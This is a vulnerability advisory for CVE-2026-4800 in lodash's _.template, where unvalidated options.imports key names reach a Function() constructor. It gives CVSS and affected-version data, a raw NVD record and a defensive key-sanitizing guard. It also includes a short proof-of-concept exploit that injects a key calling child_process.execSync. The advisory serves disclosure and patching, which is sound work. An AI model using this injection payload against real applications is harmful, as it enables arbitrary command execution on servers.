Security Vulnerability Report
CVE-2026-4800 CVSS 8.1 HIGH

CVE-2026-4800

Published: 2026-03-31 20:16:30
Last Modified: 2026-05-01 18:09:13
Source: ce714d77-add3-4f53-aff5-83d477b104bb

Description

Impact:

The fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.

When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.

Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().

Patches:

Users should upgrade to version 4.18.0.

Workarounds:

Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.
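One way an application can enforce the workaround above before calling _.template is sketched below. This is an added example, not lodash's code or the upstream fix; the names sanitizeImports, auditImports, IDENTIFIER and RESERVED are hypothetical, and the ASCII-only identifier rule is an assumption.

```javascript
// Added example: application-side guard for options.imports key names.
// Assumption: import names are plain ASCII identifiers; widen the pattern if needed.
const IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;
// Valid identifiers that should still never arrive as import names.
const RESERVED = new Set(['__proto__', 'constructor', 'prototype', 'arguments', 'eval']);

// Returns a null-prototype copy holding only own, enumerable keys that look
// like identifiers. Throws on the first key that fails, so tainted input is
// rejected before template compilation is reached.
function sanitizeImports(imports) {
  const clean = Object.create(null);
  if (imports == null) return clean;
  if (typeof imports !== 'object') {
    throw new TypeError('imports must be an object');
  }
  // Object.keys() lists own enumerable string keys only, unlike for..in,
  // so keys inherited through the prototype chain are never copied.
  for (const key of Object.keys(imports)) {
    if (!IDENTIFIER.test(key) || RESERVED.has(key)) {
      throw new RangeError('rejected import name: ' + JSON.stringify(key));
    }
    clean[key] = imports[key];
  }
  return clean;
}

// Non-throwing variant for logging: reports every key a for..in merge
// would see that is either inherited or not identifier-shaped.
function auditImports(imports) {
  const findings = [];
  for (const key in imports) { // for..in on purpose: mirrors an inherited-key merge
    const own = Object.prototype.hasOwnProperty.call(imports, key);
    if (!own || !IDENTIFIER.test(key) || RESERVED.has(key)) {
      findings.push({ key, inherited: !own });
    }
  }
  return findings;
}

// Constructed sample: one static key, one non-identifier key, one inherited key.
const proto = { inheritedKey: 1 };
const sample = Object.assign(Object.create(proto), { fmt: String, 'bad key!': 0 });
```

The guard covers only the keys the application supplies. Keys that reach the merge inside _.template through a polluted Object.prototype are outside its reach, which is why the upgrade to 4.18.0 remains the fix.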

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:lodash:lodash-amd:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:lodash:lodash-es:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:lodash:lodash.template:*:*:*:*:*:node.js:*:* - VULNERABLE
Lodash < 4.18.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
const _ = require('lodash');

// PoC for CVE-2026-4800: Code Execution via options.imports
// The key name in imports is not sanitized and flows into Function()
var source = '<%= "test" %>';
var options = {
  imports: {
    // Injecting a default parameter expression to execute arbitrary code
    'a;return global.process.mainModule.require("child_process").execSync("calc.exe");//': 'value'
  }
};

try {
  var compiled = _.template(source, options);
  compiled();
} catch (e) {
  console.log(e);
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4800", "sourceIdentifier": "ce714d77-add3-4f53-aff5-83d477b104bb", "published": "2026-03-31T20:16:29.660", "lastModified": "2026-05-01T18:09:13.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Impact:\n\nThe fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.\n\nWhen an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.\n\nAdditionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().\n\nPatches:\n\nUsers should upgrade to version 4.18.0.\n\nWorkarounds:\n\nDo not pass untrusted input as key names in options.imports. 
Only use developer-controlled, static key names."}], "metrics": {"cvssMetricV31": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.18.0", "matchCriteriaId": "39F0989E-0B80-43AC-8991-A9DD5A80A46F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:lodash:lodash-amd:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.18.0", "matchCriteriaId": "D90D1890-8336-4908-AF2B-6FAFF0C1335A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:lodash:lodash-es:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.18.0", "matchCriteriaId": "8E7D1C16-4398-4ED8-B5DD-9D3B10BA0C22"}, {"vulnerable": true, "criteria": "cpe:2.3:a:lodash:lodash.template:*:*:*:*:*:node.js:*:*", 
"versionStartIncluding": "4.0.0", "versionEndExcluding": "4.18.0", "matchCriteriaId": "D28F304B-AC93-4CAE-95BD-246998E0B009"}]}]}], "references": [{"url": "https://cna.openjsf.org/security-advisories.html", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Not Applicable"]}, {"url": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Not Applicable"]}]}}